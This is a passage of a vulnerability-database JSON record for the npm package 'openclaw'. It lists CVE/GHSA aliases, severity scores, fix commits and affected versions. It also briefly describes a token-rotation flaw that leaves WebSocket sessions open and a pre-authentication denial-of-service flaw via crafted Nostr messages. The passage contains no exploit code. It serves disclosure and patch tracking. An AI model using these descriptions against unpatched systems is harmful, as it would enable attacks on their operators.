                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41378",
                "GHSA-gjm7-hw8f-73rq"
            ],
            "risk_score": 4.0,
            "exploitability": "0.5",
            "weighted_severity": "8.0",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-yp2w-pc58-9bf6"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89997?format=api",
            "vulnerability_id": "VCID-ywrn-52gx-f3ad",
            "summary": "OpenClaw: Gateway `device.token.rotate` does not terminate active WebSocket sessions after credential rotation\n## Summary\nThe gateway's `device.token.rotate` does not terminate active WebSocket sessions after credential rotation.\n\n## Current Maintainer Triage\n- Status: open\n- Normalized severity: low\n- Assessment: v2026.3.28 rotates device tokens without disconnecting already-authenticated WebSocket sessions, so a session authenticated before the rotation stays connected afterwards. This is a real revocation gap, but a post-compromise one.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `91f7a6b0fd67b703897e6e307762d471ca09333d` — 2026-03-31T09:05:34+09:00\n\n## Release Process Note\n- The fix is already present in released version `2026.3.31`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zsxsoft for reporting.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41356",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10395",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10436",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00034",
                            "scoring_system": "epss",
                            "scoring_elements": "0.10417",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41356"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/91f7a6b0fd67b703897e6e307762d471ca09333d",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:22Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/91f7a6b0fd67b703897e6e307762d471ca09333d"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rfqg-qgf8-xr9x",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:22Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-rfqg-qgf8-xr9x"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41356",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41356"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-in-device-token-rotate",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.4",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:47:22Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-incomplete-websocket-session-termination-in-device-token-rotate"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-rfqg-qgf8-xr9x",
                    "reference_id": "GHSA-rfqg-qgf8-xr9x",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-rfqg-qgf8-xr9x"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41356",
                "GHSA-rfqg-qgf8-xr9x"
            ],
            "risk_score": 2.5,
            "exploitability": "0.5",
            "weighted_severity": "4.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ywrn-52gx-f3ad"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89498?format=api",
            "vulnerability_id": "VCID-z3rc-xpx7-fkcu",
            "summary": "Duplicate Advisory: OpenClaw: Nostr inbound DMs could trigger unauthenticated crypto work before sender policy enforcement\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-65h8-27jh-q8wv. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.22 performs cryptographic and dispatch operations on inbound Nostr direct messages before enforcing sender and pairing policy validation. Attackers can trigger unauthorized pre-authentication computation by sending crafted direct messages, enabling denial of service through resource exhaustion.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/1ee9611079e81b9122f4bed01abb3d9f56206c77"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/630f1479c44f78484dfa21bb407cbe6f171dac87"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-65h8-27jh-q8wv"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35627",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35627"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-unauthenticated-cryptographic-work-in-nostr-inbound-dm-handling"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-2j53-2c28-g9v2",
                    "reference_id": "GHSA-2j53-2c28-g9v2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-2j53-2c28-g9v2"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109983?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.22",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1j3m-fecr-f7cn"
                        },
                        {
                            "vulnerability": "VCID-1p3b-pfnn-x7ad"
                        },
                        {
                            "vulnerability": "VCID-1p5p-eth5-3ufu"
                        },
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-1smq-mbty-jkaj"
                        },
                        {
                            "vulnerability": "VCID-24m7-jx1g-hqde"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-26kp-dbu2-pqej"
                        },
                        {
                            "vulnerability": "VCID-26sg-e29u-hkf3"
                        },
                        {
                            "vulnerability": "VCID-26sv-grsd-abcw"
                        },
                        {
                            "vulnerability": "VCID-294z-6z8j-97bx"
                        },
                        {
